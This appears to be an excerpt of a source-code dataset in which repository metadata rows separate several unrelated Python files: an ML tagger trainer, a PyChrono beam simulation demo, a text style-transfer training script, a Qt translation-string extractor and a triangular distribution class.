self.load(model_file, pretrain)
else:
# build model from scratch
self.args = args
self.vocab = vocab
self.model = Tagger(args, vocab, emb_matrix=pretrain.emb if pretrain is not None else None, share_hid=args['share_hid'])
self.parameters = [p for p in self.model.parameters() if p.requires_grad]
if self.use_cuda:
self.model.cuda()
else:
self.model.cpu()
self.optimizer = utils.get_optimizer(self.args['optim'], self.parameters, self.args['lr'], betas=(0.9, self.args['beta2']), eps=1e-6)
def update(self, batch, eval=False):
inputs, orig_idx, word_orig_idx, sentlens, wordlens = unpack_batch(batch, self.use_cuda)
word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained = inputs
if eval:
self.model.eval()
else:
self.model.train()
self.optimizer.zero_grad()
loss, _ = self.model(word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained, word_orig_idx, sentlens, wordlens)
loss_val = loss.data.item()
if eval:
return loss_val
loss.backward()
torch.nn.utils.clip_grad_norm_(self.model.parameters(), self.args['max_grad_norm'])
self.optimizer.step()
return loss_val
def predict(self, batch, unsort=True):
inputs, orig_idx, word_orig_idx, sentlens, wordlens = unpack_batch(batch, self.use_cuda)
word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained = inputs
self.model.eval()
batch_size = word.size(0)
# export to onnx
onnx_export_file_name = self.model_file + ".onnx"
torch.onnx.export(
self.model,
(word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained, word_orig_idx, sentlens, wordlens),
onnx_export_file_name,
export_params = True,
opset_version=9,
do_constant_folding=True,
input_names=['input'],
output_names=['output'],
dynamic_axes={
'input': {0: 'batch_size'},
'output': {0: 'batch_size'}
}
)
onnx_model = onnx.load(onnx_export_file_name)
onnx.checker.check_model(onnx_model)
_, preds = self.model(word, word_mask, wordchars, wordchars_mask, upos, xpos, ufeats, pretrained, word_orig_idx, sentlens, wordlens)
upos_seqs = [self.vocab['upos'].unmap(sent) for sent in preds[0].tolist()]
xpos_seqs = [self.vocab['xpos'].unmap(sent) for sent in preds[1].tolist()]
feats_seqs = [self.vocab['feats'].unmap(sent) for sent in preds[2].tolist()]
pred_tokens = [[[upos_seqs[i][j], xpos_seqs[i][j], feats_seqs[i][j]] for j in range(sentlens[i])] for i in range(batch_size)]
if unsort:
pred_tokens = utils.unsort(pred_tokens, orig_idx)
return pred_tokens
def save(self, filename, skip_modules=True):
model_state = self.model.state_dict()
# skip saving modules like pretrained embeddings, because they are large and will be saved in a separate file
if skip_modules:
skipped = [k for k in model_state.keys() if k.split('.')[0] in self.model.unsaved_modules]
for k in skipped:
del model_state[k]
params = {
'model': model_state,
'vocab': self.vocab.state_dict(),
'config': self.args
}
try:
torch.save(params, filename, _use_new_zipfile_serialization=False)
logger.info("Model saved to {}".format(filename))
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
logger.warning(f"Saving failed... {e} continuing anyway.")
def load(self, filename, pretrain):
"""
Load a model from file, with preloaded pretrain embeddings. Here we allow the pretrain to be None or a dummy input,
and the actual use of pretrain embeddings will depend on the boolean config "pretrain" in the loaded args.
"""
try:
checkpoint = torch.load(filename, lambda storage, loc: storage)
except BaseException:
logger.error("Cannot load model from {}".format(filename))
raise
self.args = checkpoint['config']
self.vocab = MultiVocab.load_state_dict(checkpoint['vocab'])
# load model
emb_matrix = None
if self.args['pretrain'] and pretrain is not None: # we use pretrain only if args['pretrain'] == True and pretrain is not None
emb_matrix = pretrain.emb
self.model = Tagger(self.args, self.vocab, emb_matrix=emb_matrix, share_hid=self.args['share_hid'])
self.model.load_state_dict(checkpoint['model'], strict=False)
| 41.226027 | 141 | 0.629174 |
818129558bddbc0505e05a60216047b21343fd82 | 10,725 | py | Python | src/demos/python/fea/demo_FEA_beams_constr.py | Benatti1991/chrono | d927a7fae8ed2f4e6695cacaef28c605fcd9ffaf | [
"BSD-3-Clause"
] | 1,383 | 2015-02-04T14:17:40.000Z | 2022-03-30T04:58:16.000Z | src/demos/python/fea/demo_FEA_beams_constr.py | Benatti1991/chrono | d927a7fae8ed2f4e6695cacaef28c605fcd9ffaf | [
"BSD-3-Clause"
] | 245 | 2015-01-11T15:30:51.000Z | 2022-03-30T21:28:54.000Z | src/demos/python/fea/demo_FEA_beams_constr.py | Benatti1991/chrono | d927a7fae8ed2f4e6695cacaef28c605fcd9ffaf | [
"BSD-3-Clause"
] | 351 | 2015-02-04T14:17:47.000Z | 2022-03-30T04:42:52.000Z | # =============================================================================
# PROJECT CHRONO - http:#projectchrono.org
#
# Copyright (c) 2014 projectchrono.org
# All rights reserved.
#
# Use of this source code is governed by a BSD-style license that can be found
# in the LICENSE file at the top level of the distribution and at
# http:#projectchrono.org/license-chrono.txt.
#
# =============================================================================
# Authors: Simone Benatti
# =============================================================================
#
# FEA for 3D beams and constraints
#
# =============================================================================
import math as m
import pychrono as chrono
import pychrono.fea as fea
import pychrono.pardisomkl as pardiso
import pychrono.irrlicht as chronoirr
import os
# Create a motor between the truss and the crank:
class ChFunction_myf (chrono.ChFunction):
def __init__(self):
chrono.ChFunction.__init__(self)
def Get_y(self,x):
if (x > 0.4):
return chrono.CH_C_PI
else:
return -chrono.CH_C_PI * (1.0 - m.cos(chrono.CH_C_PI * x / 0.4)) / 2.0
# Output directory
out_dir = chrono.GetChronoOutputPath() + "BEAM_BUCKLING"
print( "Copyright (c) 2017 projectchrono.org \n")
# Create a Chrono::Engine physical system
my_system = chrono.ChSystemSMC()
# Create the Irrlicht visualization (open the Irrlicht device,
# bind a simple user interface, etc. etc.)
application = chronoirr.ChIrrApp(my_system, "Beams and constraints", chronoirr.dimension2du(800, 600))
# Easy shortcuts to add camera, lights, logo and sky in Irrlicht scene:
application.AddTypicalLogo()
application.AddTypicalSky()
application.AddTypicalLights()
application.AddTypicalCamera(chronoirr.vector3df(0.0, 0.6, -1.0))
L = 1
H = 0.25
K = 0.05
vA = chrono.ChVectorD(0, 0, 0)
vC = chrono.ChVectorD(L, 0, 0)
vB = chrono.ChVectorD(L, -H, 0)
vG = chrono.ChVectorD(L - K, -H, 0)
vd = chrono.ChVectorD(0, 0, 0.0001)
# Create a truss:
body_truss = chrono.ChBody()
body_truss.SetBodyFixed(True)
my_system.AddBody(body_truss)
# Attach a 'box' shape asset for visualization.
mboxtruss = chrono.ChBoxShape()
mboxtruss.GetBoxGeometry().Pos = chrono.ChVectorD(-0.01, 0, 0)
mboxtruss.GetBoxGeometry().SetLengths(chrono.ChVectorD(0.02, 0.2, 0.1))
body_truss.AddAsset(mboxtruss)
# Create body for crank
body_crank = chrono.ChBody()
body_crank.SetPos((vB + vG) * 0.5)
my_system.AddBody(body_crank)
# Attach a 'box' shape asset for visualization.
mboxcrank = chrono.ChBoxShape()
mboxcrank.GetBoxGeometry().Pos = chrono.ChVectorD(0, 0, 0)
mboxcrank.GetBoxGeometry().SetLengths(chrono.ChVectorD(K, 0.02, 0.02))
body_crank.AddAsset(mboxcrank)
motor = chrono.ChLinkMotorRotationAngle()
motor.Initialize(body_truss, body_crank, chrono.ChFrameD(vG))
myfun = ChFunction_myf()
motor.SetAngleFunction(myfun)
my_system.Add(motor)
# Create a FEM mesh, that is a container for groups
# of elements and their referenced nodes.
my_mesh = fea.ChMesh()
# Create the horizontal beam (use an IGA-beam finite element type, for example)
beam_wy = 0.10
beam_wz = 0.01
# Create a section for the IGA beam.
# IGA beams require ChBeamSectionCosserat sections, containing at least
# a ChElasticityCosserat and ChInertiaCosserat models, and optional ChDampingCosserat and ChPlasticityCosserat.
minertia = fea.ChInertiaCosseratSimple()
minertia.SetAsRectangularSection(beam_wy, beam_wz, 2700) # automatically sets A etc., from width, height, density
melasticity = fea.ChElasticityCosseratSimple()
melasticity.SetYoungModulus(73.0e9)
melasticity.SetGwithPoissonRatio(0.3)
melasticity.SetAsRectangularSection(beam_wy, beam_wz)
msection1 = fea.ChBeamSectionCosserat(minertia, melasticity)
msection1.SetDrawThickness(beam_wy, beam_wz)
builder_iga = fea.ChBuilderBeamIGA()
builder_iga.BuildBeam(my_mesh, # the mesh to put the elements in
msection1, # section of the beam
32, # number of sections (spans)
vA, # start point
vC, # end point
chrono.VECT_Y, # suggested Y direction of section
3) # order (3 = cubic, etc)
builder_iga.GetLastBeamNodes().front().SetFixed(True)
node_tip = builder_iga.GetLastBeamNodes()[-1]
node_mid = builder_iga.GetLastBeamNodes()[17]
# Create the vertical beam (Here use Euler beams, for example).
msection2 = fea.ChBeamSectionEulerAdvanced()
hbeam_d = 0.024
msection2.SetDensity(2700)
msection2.SetYoungModulus(73.0e9)
msection2.SetGwithPoissonRatio(0.3)
msection2.SetBeamRaleyghDamping(0.000)
msection2.SetAsCircularSection(hbeam_d)
builderA = fea.ChBuilderBeamEuler()
builderA.BuildBeam(my_mesh, # the mesh where to put the created nodes and elements
msection2, # the ChBeamSectionEulerAdvanced to use for the ChElementBeamEuler elements
3, # the number of ChElementBeamEuler to create
vC + vd, # the 'A' poin space (beginning of beam)
vB + vd, # the 'B' poin space (end of beam)
chrono.ChVectorD(1, 0, 0)) # the 'Y' up direction of the section for the beam
node_top = builderA.GetLastBeamNodes()[0]
node_down = builderA.GetLastBeamNodes()[-1]
# Create a constrabetween the vertical and horizontal beams:
constr_bb = chrono.ChLinkMateGeneric()
constr_bb.Initialize(node_top, node_tip, False, node_top.Frame(), node_top.Frame())
my_system.Add(constr_bb)
constr_bb.SetConstrainedCoords(True, True, True, # x, y, z
False, False, False) # Rx, Ry, Rz
# For example, attach small shape to show the constraint
msphereconstr2 = chrono.ChSphereShape()
msphereconstr2.GetSphereGeometry().rad = 0.01
constr_bb.AddAsset(msphereconstr2)
# Create a beam as a crank
msection3 = fea.ChBeamSectionEulerAdvanced()
crankbeam_d = 0.048
msection3.SetDensity(2700)
msection3.SetYoungModulus(73.0e9)
msection3.SetGwithPoissonRatio(0.3)
msection3.SetBeamRaleyghDamping(0.000)
msection3.SetAsCircularSection(crankbeam_d)
builderB = fea.ChBuilderBeamEuler()
builderB.BuildBeam(my_mesh, # the mesh where to put the created nodes and elements
msection3, # the ChBeamSectionEulerAdvanced to use for the ChElementBeamEuler elements
3, # the number of ChElementBeamEuler to create
vG + vd, # the 'A' poin space (beginning of beam)
vB + vd, # the 'B' poin space (end of beam)
chrono.ChVectorD(0, 1, 0)) # the 'Y' up direction of the section for the beam
node_crankG = builderB.GetLastBeamNodes()[0]
node_crankB = builderB.GetLastBeamNodes()[-1]
# Create a constraint between the crank beam and body crank:
constr_cbd = chrono.ChLinkMateGeneric()
constr_cbd.Initialize(node_crankG, body_crank, False, node_crankG.Frame(), node_crankG.Frame())
my_system.Add(constr_cbd)
constr_cbd.SetConstrainedCoords(True, True, True, # x, y, z
True, True, True) # Rx, Ry, Rz
# Create a constrabetween the vertical beam and the crank beam:
constr_bc = chrono.ChLinkMateGeneric()
constr_bc.Initialize(node_down, node_crankB, False, node_crankB.Frame(), node_crankB.Frame())
my_system.Add(constr_bc)
constr_bc.SetConstrainedCoords(True, True, True, # x, y, z
True, True, False) # Rx, Ry, Rz
# For example, attach small shape to show the constraint
msphereconstr3 = chrono.ChSphereShape()
msphereconstr3.GetSphereGeometry().rad = 0.01
constr_bc.AddAsset(msphereconstr3)
#
# Final touches..
#
# We do not want gravity effect on FEA elements in this demo
my_mesh.SetAutomaticGravity(False)
# Remember to add the mesh to the system!
my_system.Add(my_mesh)
# ==Asset== attach a visualization of the FEM mesh.
# This will automatically update a triangle mesh (a ChTriangleMeshShape
# asset that is internally managed) by setting proper
# coordinates and vertex colors as in the FEM elements.
# Such triangle mesh can be rendered by Irrlicht or POVray or whatever
# postprocessor that can handle a colored ChTriangleMeshShape).
# Do not forget AddAsset() at the end!
mvisualizebeamA = fea.ChVisualizationFEAmesh(my_mesh)
mvisualizebeamA.SetFEMdataType(fea.ChVisualizationFEAmesh.E_PLOT_ELEM_BEAM_MX)
mvisualizebeamA.SetColorscaleMinMax(-500, 500)
mvisualizebeamA.SetSmoothFaces(True)
mvisualizebeamA.SetWireframe(False)
my_mesh.AddAsset(mvisualizebeamA)
mvisualizebeamC = fea.ChVisualizationFEAmesh(my_mesh)
mvisualizebeamC.SetFEMglyphType(fea.ChVisualizationFEAmesh.E_GLYPH_NODE_CSYS)
mvisualizebeamC.SetFEMdataType(fea.ChVisualizationFEAmesh.E_PLOT_NONE)
mvisualizebeamC.SetSymbolsThickness(0.006)
mvisualizebeamC.SetSymbolsScale(0.01)
mvisualizebeamC.SetZbufferHide(False)
my_mesh.AddAsset(mvisualizebeamC)
# ==IMPORTANT!== Use this function for adding a ChIrrNodeAsset to all items
# in the system. These ChIrrNodeAsset assets are 'proxies' to the Irrlicht meshes.
# If you need a finer control on which item really needs a visualization proxy in
# Irrlicht, just use application.AssetBind(myitem) on a per-item basis.
application.AssetBindAll()
# ==IMPORTANT!== Use this function for 'converting' into Irrlicht meshes the assets
# that you added to the bodies into 3D shapes, they can be visualized by Irrlicht!
application.AssetUpdateAll()
# SIMULATION LOOP
# Use a solver that can handle stiffnss matrices:
pardiso_solver = pardiso.ChSolverPardisoMKL()
my_system.SetSolver(pardiso_solver)
application.SetTimestep(0.001)
application.SetVideoframeSaveInterval(10)
# Use the following for less numerical damping, 2nd order accuracy (but slower)
ts = chrono.ChTimestepperHHT(my_system)
ts.SetStepControl(False)
my_system.SetTimestepper(ts)
# Output data
if not os.path.isdir(out_dir):
print("Error creating directory " )
filename = out_dir + "/buckling_mid.dat"
#file_out1 = chrono.ChStreamOutAsciiFile(filename)
while (application.GetDevice().run()):
application.BeginScene()
application.DrawAll()
chronoirr.drawGrid(application.GetVideoDriver(), 0.05, 0.05, 20, 20, chrono.ChCoordsysD(chrono.VNULL, chrono.CH_C_PI_2, chrono.VECT_Z),
chronoirr.SColor(50, 90, 90, 90), True)
application.DoStep()
# Save output for the first 0.4 seconds
#if (application.GetSystem().GetChTime() <= 0.4):
#file_out1(application.GetSystem().GetChTime() + " " + node_mid.GetPos().z() + " " + node_mid.GetWvel_par().x() + "\n")
application.EndScene()
| 38.16726 | 139 | 0.702657 |
87a00e56f2ce796eab88192eea693b22ec87a146 | 10,375 | py | Python | method/mymodel-yelp/main.py | julian-pani/controllable-text-attribute-transfer | f60281702a37b681634b86c8597df542bafa64f5 | [
"Apache-2.0"
] | null | null | null | method/mymodel-yelp/main.py | julian-pani/controllable-text-attribute-transfer | f60281702a37b681634b86c8597df542bafa64f5 | [
"Apache-2.0"
] | null | null | null | method/mymodel-yelp/main.py | julian-pani/controllable-text-attribute-transfer | f60281702a37b681634b86c8597df542bafa64f5 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# requirements: pytorch: 0.4
# Author: Ke Wang
# Contact: wangke17[AT]pku.edu.cn
import time
import argparse
import math
import os
import torch
import torch.nn as nn
from torch import optim
import numpy
import matplotlib
from matplotlib import pyplot as plt
# Import your model files.
from model import make_model, Classifier, NoamOpt, LabelSmoothing, fgim_attack
from data import prepare_data, non_pair_data_loader, get_cuda, pad_batch_seuqences, id2text_sentence,\
to_var, calc_bleu, load_human_answer
os.environ['CUDA_LAUNCH_BLOCKING'] = "1"
# os.environ["CUDA_VISIBLE_DEVICES"] = "0"
######################################################################################
# Environmental parameters
######################################################################################
parser = argparse.ArgumentParser(description="Here is your model discription.")
parser.add_argument('--id_pad', type=int, default=0, help='')
parser.add_argument('--id_unk', type=int, default=1, help='')
parser.add_argument('--id_bos', type=int, default=2, help='')
parser.add_argument('--id_eos', type=int, default=3, help='')
######################################################################################
# File parameters
######################################################################################
parser.add_argument('--task', type=str, default='yelp', help='Specify datasets.')
parser.add_argument('--word_to_id_file', type=str, default='', help='')
parser.add_argument('--data_path', type=str, default='', help='')
######################################################################################
# Model parameters
######################################################################################
parser.add_argument('--word_dict_max_num', type=int, default=5, help='')
parser.add_argument('--batch_size', type=int, default=128, help='')
parser.add_argument('--max_sequence_length', type=int, default=60)
parser.add_argument('--num_layers_AE', type=int, default=2)
parser.add_argument('--transformer_model_size', type=int, default=256)
parser.add_argument('--transformer_ff_size', type=int, default=1024)
parser.add_argument('--latent_size', type=int, default=256)
parser.add_argument('--word_dropout', type=float, default=1.0)
parser.add_argument('--embedding_dropout', type=float, default=0.5)
parser.add_argument('--learning_rate', type=float, default=0.001)
parser.add_argument('--label_size', type=int, default=1)
parser.add_argument('--load_from_checkpoint', type=int, default=False)
parser.add_argument('--checkpoint_name', type=str, default="")
args = parser.parse_args()
# args.if_load_from_checkpoint = False
# args.if_load_from_checkpoint = True
# args.checkpoint_name = "1569079093"
######################################################################################
# End of hyper parameters
######################################################################################
def add_log(ss):
now_time = time.strftime("[%Y-%m-%d %H:%M:%S]: ", time.localtime())
print(now_time + ss)
with open(args.log_file, 'a') as f:
f.write(now_time + str(ss) + '\n')
return
def add_output(ss):
with open(args.output_file, 'a') as f:
f.write(str(ss) + '\n')
return
def preparation():
# set model save path
if args.load_from_checkpoint:
timestamp = args.checkpoint_name
else:
timestamp = str(int(time.time()))
print("create new model save path: %s" % timestamp)
args.current_save_path = 'save/%s/' % timestamp
args.log_file = args.current_save_path + time.strftime("log_%Y_%m_%d_%H_%M_%S.txt", time.localtime())
args.output_file = args.current_save_path + time.strftime("output_%Y_%m_%d_%H_%M_%S.txt", time.localtime())
print("create log file at path: %s" % args.log_file)
if os.path.exists(args.current_save_path):
add_log("Load checkpoint model from Path: %s" % args.current_save_path)
else:
os.makedirs(args.current_save_path)
add_log("Path: %s is created" % args.current_save_path)
# set task type
if args.task == 'yelp':
args.data_path = '../../data/yelp/processed_files/'
elif args.task == 'amazon':
args.data_path = '../../data/amazon/processed_files/'
elif args.task == 'imagecaption':
pass
else:
raise TypeError('Wrong task type!')
# prepare data
args.id_to_word, args.vocab_size, \
args.train_file_list, args.train_label_list = prepare_data(
data_path=args.data_path, max_num=args.word_dict_max_num, task_type=args.task
)
return
def train_iters(ae_model, dis_model):
train_data_loader = non_pair_data_loader(
batch_size=args.batch_size, id_bos=args.id_bos,
id_eos=args.id_eos, id_unk=args.id_unk,
max_sequence_length=args.max_sequence_length, vocab_size=args.vocab_size
)
train_data_loader.create_batches(args.train_file_list, args.train_label_list, if_shuffle=True)
add_log("Start train process.")
ae_model.train()
dis_model.train()
ae_optimizer = NoamOpt(ae_model.src_embed[0].d_model, 1, 2000,
torch.optim.Adam(ae_model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9))
dis_optimizer = torch.optim.Adam(dis_model.parameters(), lr=0.0001)
ae_criterion = get_cuda(LabelSmoothing(size=args.vocab_size, padding_idx=args.id_pad, smoothing=0.1))
dis_criterion = nn.BCELoss(size_average=True)
for epoch in range(200):
print('-' * 94)
epoch_start_time = time.time()
for it in range(train_data_loader.num_batch):
batch_sentences, tensor_labels, \
tensor_src, tensor_src_mask, tensor_tgt, tensor_tgt_y, \
tensor_tgt_mask, tensor_ntokens = train_data_loader.next_batch()
# Forward pass
latent, out = ae_model.forward(tensor_src, tensor_tgt, tensor_src_mask, tensor_tgt_mask)
# Loss calculation
loss_rec = ae_criterion(out.contiguous().view(-1, out.size(-1)),
tensor_tgt_y.contiguous().view(-1)) / tensor_ntokens.data
ae_optimizer.optimizer.zero_grad()
loss_rec.backward()
ae_optimizer.step()
# Classifier
dis_lop = dis_model.forward(to_var(latent.clone()))
loss_dis = dis_criterion(dis_lop, tensor_labels)
dis_optimizer.zero_grad()
loss_dis.backward()
dis_optimizer.step()
if it % 200 == 0:
add_log(
'| epoch {:3d} | {:5d}/{:5d} batches | rec loss {:5.4f} | dis loss {:5.4f} |'.format(
epoch, it, train_data_loader.num_batch, loss_rec, loss_dis))
print(id2text_sentence(tensor_tgt_y[0], args.id_to_word))
generator_text = ae_model.greedy_decode(latent,
max_len=args.max_sequence_length,
start_id=args.id_bos)
print(id2text_sentence(generator_text[0], args.id_to_word))
add_log(
'| end of epoch {:3d} | time: {:5.2f}s |'.format(
epoch, (time.time() - epoch_start_time)))
# Save model
torch.save(ae_model.state_dict(), args.current_save_path + 'ae_model_params.pkl')
torch.save(dis_model.state_dict(), args.current_save_path + 'dis_model_params.pkl')
return
def eval_iters(ae_model, dis_model):
eval_data_loader = non_pair_data_loader(
batch_size=1, id_bos=args.id_bos,
id_eos=args.id_eos, id_unk=args.id_unk,
max_sequence_length=args.max_sequence_length, vocab_size=args.vocab_size
)
eval_file_list = [
args.data_path + 'sentiment.test.0',
args.data_path + 'sentiment.test.1',
]
eval_label_list = [
[0],
[1],
]
eval_data_loader.create_batches(eval_file_list, eval_label_list, if_shuffle=False)
gold_ans = load_human_answer(args.data_path)
assert len(gold_ans) == eval_data_loader.num_batch
add_log("Start eval process.")
ae_model.eval()
dis_model.eval()
for it in range(eval_data_loader.num_batch):
batch_sentences, tensor_labels, \
tensor_src, tensor_src_mask, tensor_tgt, tensor_tgt_y, \
tensor_tgt_mask, tensor_ntokens = eval_data_loader.next_batch()
print("------------%d------------" % it)
print(id2text_sentence(tensor_tgt_y[0], args.id_to_word))
print("origin_labels", tensor_labels)
latent, out = ae_model.forward(tensor_src, tensor_tgt, tensor_src_mask, tensor_tgt_mask)
generator_text = ae_model.greedy_decode(latent,
max_len=args.max_sequence_length,
start_id=args.id_bos)
print(id2text_sentence(generator_text[0], args.id_to_word))
# Define target label
target = get_cuda(torch.tensor([[1.0]], dtype=torch.float))
if tensor_labels[0].item() > 0.5:
target = get_cuda(torch.tensor([[0.0]], dtype=torch.float))
print("target_labels", target)
modify_text = fgim_attack(dis_model, latent, target, ae_model, args.max_sequence_length, args.id_bos,
id2text_sentence, args.id_to_word, gold_ans[it])
add_output(modify_text)
return
if __name__ == '__main__':
print(args.load_from_checkpoint)
print(args.checkpoint_name)
preparation()
ae_model = get_cuda(make_model(d_vocab=args.vocab_size,
N=args.num_layers_AE,
d_model=args.transformer_model_size,
latent_size=args.latent_size,
d_ff=args.transformer_ff_size,
))
dis_model = get_cuda(Classifier(latent_size=args.latent_size, output_size=args.label_size))
if args.load_from_checkpoint:
# Load models' params from checkpoint
ae_model.load_state_dict(torch.load(args.current_save_path + 'ae_model_params.pkl'))
dis_model.load_state_dict(torch.load(args.current_save_path + 'dis_model_params.pkl'))
else:
train_iters(ae_model, dis_model)
eval_iters(ae_model, dis_model)
print("Done!")
| 39.599237 | 111 | 0.611181 |
d95b8a27ac2ebdd5e4b8ab34161bb2137f577510 | 1,805 | py | Python | share/qt/extract_strings_qt.py | wizadr/DiminutiveCoin | 678ac688217b4578308c3a9cd6ccd1e7a08ecaf4 | [
"MIT"
] | 1 | 2022-03-27T20:06:29.000Z | 2022-03-27T20:06:29.000Z | share/qt/extract_strings_qt.py | MadCatMining/DiminutiveCoin | 678ac688217b4578308c3a9cd6ccd1e7a08ecaf4 | [
"MIT"
] | null | null | null | share/qt/extract_strings_qt.py | MadCatMining/DiminutiveCoin | 678ac688217b4578308c3a9cd6ccd1e7a08ecaf4 | [
"MIT"
] | 2 | 2022-01-10T00:41:44.000Z | 2022-02-24T09:11:26.000Z | #!/usr/bin/python
'''
Extract _("...") strings for translation and convert to Qt4 stringdefs so that
they can be picked up by Qt linguist.
'''
from subprocess import Popen, PIPE
import glob
OUT_CPP="src/qt/diminutivecoinstrings.cpp"
EMPTY=['""']
def parse_po(text):
"""
Parse 'po' format produced by xgettext.
Return a list of (msgid,msgstr) tuples.
"""
messages = []
msgid = []
msgstr = []
in_msgid = False
in_msgstr = False
for line in text.split('\n'):
line = line.rstrip('\r')
if line.startswith('msgid '):
if in_msgstr:
messages.append((msgid, msgstr))
in_msgstr = False
# message start
in_msgid = True
msgid = [line[6:]]
elif line.startswith('msgstr '):
in_msgid = False
in_msgstr = True
msgstr = [line[7:]]
elif line.startswith('"'):
if in_msgid:
msgid.append(line)
if in_msgstr:
msgstr.append(line)
if in_msgstr:
messages.append((msgid, msgstr))
return messages
files = glob.glob('src/*.cpp') + glob.glob('src/*.h')
# xgettext -n --keyword=_ $FILES
child = Popen(['xgettext','--output=-','-n','--keyword=_'] + files, stdout=PIPE)
(out, err) = child.communicate()
messages = parse_po(out)
f = open(OUT_CPP, 'w')
f.write("""#include <QtGlobal>
// Automatically generated by extract_strings.py
#ifdef __GNUC__
#define UNUSED __attribute__((unused))
#else
#define UNUSED
#endif
""")
f.write('static const char UNUSED *diminutivecoin_strings[] = {')
for (msgid, msgstr) in messages:
if msgid != EMPTY:
f.write('QT_TRANSLATE_NOOP("diminutivecoin-core", %s),\n' % ('\n'.join(msgid)))
f.write('};')
f.close()
| 25.422535 | 87 | 0.584488 |
f7a7a62d7f576e49e998225fc0a68717990c829d | 7,044 | py | Python | probdists/Triangulardistribution.py | m0hit-kumar/probdists | 786d4f6c53534c318499d97200355f94c8c48919 | [
"MIT"
] | null | null | null | probdists/Triangulardistribution.py | m0hit-kumar/probdists | 786d4f6c53534c318499d97200355f94c8c48919 | [
"MIT"
] | null | null | null | probdists/Triangulardistribution.py | m0hit-kumar/probdists | 786d4f6c53534c318499d97200355f94c8c48919 | [
"MIT"
] | null | null | null | import math
import matplotlib.pyplot as plt
from .Generaldistribution import Distribution
from collections import Counter
import seaborn as sns
class Triangular(Distribution):
"""
Triangular distribution class for calculating and visualizing the
triangular distribution: a continuous probability distribution shaped
like a triangle
Note: a <= mode <= b
Attributes:
a (float): the minimum lower limit value
b (float): the maximum upper limit value
mode (float): the mode, where min <= mode <= max
mean (float): the mean value of the distribution
stdev (float): the standard deviation of the distribution
"""
def __init__(self, a=0, b=1, mode=0.5):
if b < mode < a or a == b:
raise ValueError
if a == b or a == mode or b == mode:
raise TriangularValueException()
self.a = a
self.b = b
self.mode = mode
Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev())
def calculate_mean(self, round_to=2):
"""
Method to calculate the mean from the min, max and mode
Args:
round_to (int): Round the mean value. Defaults to 2.
Returns:
float: mean of the data set
"""
self.mean = 1 / 3 * (self.a + self.b + self.mode)
return round(self.mean, round_to)
def calculate_stdev(self, round_to=2):
"""
Method to calculate the standard deviation from the min, max and mode
Args:
round_to (int): Round the mean value. Defaults to 2.
Returns:
float: standard deviation of the data set
"""
summation = (
(self.a ** 2)
+ (self.b ** 2)
+ (self.mode ** 2)
- (self.a * self.b)
- (self.a * self.mode)
- (self.b * self.mode)
)
variance = summation / 18
self.stdev = math.sqrt(variance)
return round(self.stdev, round_to)
def replace_stats_with_data(self):
"""Method to calculate a, b, mode from the data set
Args:
None
Returns:
float: a, the minimum value
float: b, the maximum value
float: mode, the mode of the dataset
"""
if not self.data:
# Use default values
min_a, max_b, mode = 0, 1, 0.5
else:
min_a = min(self.data)
max_b = max(self.data)
mode = self.calculate_mode()
if min == max or min == mode or max == mode:
raise TriangularValueException()
self.a = min_a
self.b = max_b
self.mode = mode
return self.a, self.b, self.mode
def calculate_mode(self, round_to=2):
"""
Calculates the mode of a dataset
If no single mode, it will approximate the mode using the mean
Args:
round_to (int): Round the mode value. [Default value: 2]
Returns:
float: mode of data
"""
frequency_dict = dict(Counter(self.data))
max_frequency = max(list(frequency_dict.values()))
# Create list of modes from data
mode = [k for k, v in frequency_dict.items() if v == max_frequency]
if len(mode) == 1:
return mode[0]
else:
# Multiple modes
msg = f"""Multiple modes found: {str(mode)}, Triangular Distribution requires single mode"""
raise TriangularValueException(msg)
def calculate_pdf(self, x, round_to=2):
"""
Probability density function calculator for the Triangular distribution.
Args:
x (float): point for calculating the probability density function
round_to (int): Round the pdf value. [Default value: 2]
Returns:
float: probability density function
"""
# Check equivalence
if self.a == self.b or self.a == self.mode or self.b == self.mode:
raise TriangularValueException()
value = 0 # default value for when x < min or x > max
if self.a <= x < self.mode:
value = (2 * (x - self.a)) / ((self.b - self.a) * (self.mode - self.a))
elif self.mode == x:
value = 2 / (self.b - self.a)
elif self.mode < x <= self.b:
value = (2 * (self.b - x)) / ((self.b - self.a) * (self.b - self.mode))
self.pdf = value
return round(self.pdf, round_to)
def calculate_cdf(self, x, round_to=2):
"""
Cumulative density function calculator for the Triangular distribution.
Args:
x (float): point for calculating the cumulative density function
round_to (int): Round the value. [Default value: 2]
Returns:
float: cumulative density function output
"""
# Check equivalence
if self.a == self.b or self.a == self.mode or self.b == self.mode:
raise TriangularValueException()
if x < self.a:
value = 0
elif self.a <= x <= self.mode:
num = (x - self.a) ** 2
den = (self.b - self.a) * (self.mode - self.a)
value = num / den
elif self.mode < x <= self.b:
num = (self.b - x) ** 2
den = (self.b - self.a) * (self.b - self.mode)
value = 1 - (num / den)
else:
value = 1
self.cdf = value
return round(self.cdf, round_to)
def plot_bar_pdf(self):
"""
Method to plot the pdf of the triangular distribution.
Args:
self
Returns:
None
"""
x = [self.a, self.mode, self.b]
peak = 2 / (self.b - self.a)
y = [0, peak, 0]
sns.lineplot(x, y).set(
title="Probability Density Plot for Triangular Distribution",
xlabel="Probability",
ylabel="x",
)
plt.show()
return x, y
def __repr__(self):
"""
Outputs the characteristics of the Triangular Distribution instance.
Args:
self
Returns:
string: characteristics of the Triangle
"""
return (
f"minimum: {self.a}, maximum: {self.b}, mode: {self.mode}, "
f"mean: {self.mean}, standard deviation: {self.stdev}"
)
class TriangularValueException(Exception):
"""
Defines Exception raised when minimum, maximum or mode values are equal
and TriangularDistribution instance cannot be created
Attributes:
message (str): Error message to return
"""
def __init__(self, msg=None):
if msg is not None:
self.message = msg
else:
self.message = "Minimum, Maximum, or Mode cannot be equivalent"
def __str__(self):
if self.message:
return f"""TriangularValueException: {self.message}"""
return f"""TriangularValueException Raised"""
| 28.634146 | 104 | 0.548978 |
d94e48635e9d2ef72aafeb89e0cd91465420f984 | 1,167 | py | Python | shuter/shooter_game.py | vlax679/shuter | 8df27dfc9f6686df4f7b97ac831fb9518ea7da95 | [
"CC0-1.0"
